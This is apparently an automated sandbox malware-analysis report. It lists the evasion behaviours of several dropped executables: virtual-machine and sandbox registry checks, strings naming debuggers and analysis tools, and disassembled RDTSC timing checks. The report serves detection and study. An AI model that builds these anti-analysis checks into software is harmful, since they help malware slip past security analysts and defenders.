Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Windows\SysWOW64\svchost.exe

Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Jump to behavior

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\file.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_0-11121
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_2-9967

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe

System information queried: FirmwareTableInformation

Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	API/Special instruction interceptor: Address: 7FFBCB7AD044
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFBCB7AD044

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE
Source: svchost.exe, 00000008.00000002.1732509948.0000000003100000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: svchost.exe, 00000008.00000002.1732509948.0000000003100000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OLLYDBG.EXE
Source: 4ec75545d6.exe, 00000007.00000002.1749010059.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, 4ec75545d6.exe, 00000007.00000002.1746298849.000000000050C000.00000004.00000001.01000000.0000000A.sdmp	Binary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
Source: svchost.exe, 00000008.00000002.1732509948.0000000003100000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IDAQ64.EXEAUTORUNS.EXEDUMPCAP.EXEDE4DOT.EXEHOOKEXPLORER.EXEILSPY.EXELORDPE.EXEDNSPY.EXEPETOOLS.EXEAUTORUNSC.EX#
Source: svchost.exe, 00000008.00000002.1732509948.0000000003100000.00000004.00000020.00020000.00000000.sdmp, bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE
Source: svchost.exe, 00000008.00000002.1732509948.0000000003100000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IDDLER EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMUNITYDEBUGGER.EXEWINDUMP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEP}
Source: 4ec75545d6.exe, 00000007.00000002.1749010059.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, 4ec75545d6.exe, 00000007.00000002.1746298849.000000000050C000.00000004.00000001.01000000.0000000A.sdmp	Binary or memory string: INTERNALNAMECFF EXPLORER.EXE
Source: bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: WINDBG.EXE
Source: svchost.exe, 00000008.00000002.1732509948.0000000003100000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AUTORUNS.EXE
Source: svchost.exe, 00000008.00000002.1732509948.0000000003100000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PETOOLS.EXE
Source: svchost.exe, 00000008.00000002.1732509948.0000000003100000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXE
Source: svchost.exe, 00000008.00000002.1732509948.0000000003100000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WINDUMP.EXE
Source: svchost.exe, 00000008.00000002.1732509948.0000000003100000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXE
Source: bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB0EB5 second address: BB0EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F568CBD42B6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAFEC9 second address: BAFED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB0463 second address: BB047B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F568CBD42C1h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB047B second address: BB048B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F568CECBB26h 0x0000000a jnc 00007F568CECBB26h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2A11 second address: BB2A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 jmp 00007F568CBD42BBh 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jne 00007F568CBD42BCh 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pop edx 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F568CBD42C8h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2B3B second address: BB2B60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F568CECBB32h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2B60 second address: BB2B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2B64 second address: BB2BFD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F568CECBB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pop eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F568CECBB28h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 jmp 00007F568CECBB30h 0x0000002b mov dword ptr [ebp+122D1CE3h], edx 0x00000031 push 00000003h 0x00000033 call 00007F568CECBB32h 0x00000038 mov edi, esi 0x0000003a pop edx 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ecx 0x00000040 call 00007F568CECBB28h 0x00000045 pop ecx 0x00000046 mov dword ptr [esp+04h], ecx 0x0000004a add dword ptr [esp+04h], 0000001Dh 0x00000052 inc ecx 0x00000053 push ecx 0x00000054 ret 0x00000055 pop ecx 0x00000056 ret 0x00000057 push 00000003h 0x00000059 mov dword ptr [ebp+122D3C7Fh], esi 0x0000005f push 93C83BAFh 0x00000064 jng 00007F568CECBB34h 0x0000006a pushad 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2BFD second address: BB2C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F568CBD42B6h 0x0000000a popad 0x0000000b add dword ptr [esp], 2C37C451h 0x00000012 mov edx, dword ptr [ebp+122D2F92h] 0x00000018 lea ebx, dword ptr [ebp+1244797Ah] 0x0000001e xchg eax, ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 ja 00007F568CBD42B8h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2C26 second address: BB2C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2D2A second address: BB2D34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F568CBD42B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2D34 second address: BB2D38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2D38 second address: BB2D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edi 0x0000000d push ebx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop ebx 0x00000011 pop edi 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F568CBD42C5h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2D63 second address: BB2D6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F568CECBB26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2E40 second address: BB2E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2E44 second address: BB2E74 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F568CECBB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 3DFEF501h 0x00000012 xor edx, dword ptr [ebp+122D2DD6h] 0x00000018 mov ecx, dword ptr [ebp+122D2DCAh] 0x0000001e lea ebx, dword ptr [ebp+12447983h] 0x00000024 mov edi, 7BA93868h 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2E74 second address: BB2E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2E78 second address: BB2E7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2E7C second address: BB2E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2E82 second address: BB2EA5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F568CECBB3Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2F30 second address: BB2F35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2F35 second address: BB2F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F568CECBB26h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 08AB4CC3h 0x00000014 xor esi, dword ptr [ebp+122D2F5Eh] 0x0000001a adc cl, 00000065h 0x0000001d push 00000003h 0x0000001f mov edi, dword ptr [ebp+122D2D1Eh] 0x00000025 push 00000000h 0x00000027 mov edx, eax 0x00000029 push 00000003h 0x0000002b mov edi, edx 0x0000002d call 00007F568CECBB29h 0x00000032 jbe 00007F568CECBB3Eh 0x00000038 jmp 00007F568CECBB38h 0x0000003d push eax 0x0000003e push ecx 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2F8E second address: BB2FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F568CBD42C8h 0x0000000f mov eax, dword ptr [eax] 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2FB7 second address: BB2FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2FBB second address: BB2FD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2FD5 second address: BB2FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2FD9 second address: BB2FDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2FDF second address: BB300C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F568CECBB28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c mov dx, AA43h 0x00000010 popad 0x00000011 lea ebx, dword ptr [ebp+1244798Eh] 0x00000017 jmp 00007F568CECBB2Eh 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB300C second address: BB3010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD35CF second address: BD35D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD35D3 second address: BD35DF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnp 00007F568CBD42B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD35DF second address: BD35F1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007F568CECBB26h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F568CECBB26h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD1796 second address: BD179A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD179A second address: BD180C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jp 00007F568CECBB26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jns 00007F568CECBB26h 0x00000015 jmp 00007F568CECBB38h 0x0000001a popad 0x0000001b jmp 00007F568CECBB38h 0x00000020 popad 0x00000021 pushad 0x00000022 jmp 00007F568CECBB2Bh 0x00000027 pushad 0x00000028 jmp 00007F568CECBB33h 0x0000002d jns 00007F568CECBB26h 0x00000033 popad 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD180C second address: BD1812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD1812 second address: BD182A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB34h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD1ADF second address: BD1AEA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jl 00007F568CBD42B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD1DBC second address: BD1E14 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F568CECBB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F568CECBB37h 0x0000000f jno 00007F568CECBB3Fh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F568CECBB33h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD1E14 second address: BD1E2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42C0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD1FB1 second address: BD1FC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F568CECBB26h 0x00000009 ja 00007F568CECBB26h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD2111 second address: BD2129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F568CBD42C3h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD2129 second address: BD2142 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F568CECBB2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jg 00007F568CECBB2Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD2142 second address: BD214A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD228E second address: BD22A5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F568CECBB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F568CECBB2Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD22A5 second address: BD22C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F568CBD42C9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD22C4 second address: BD22C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
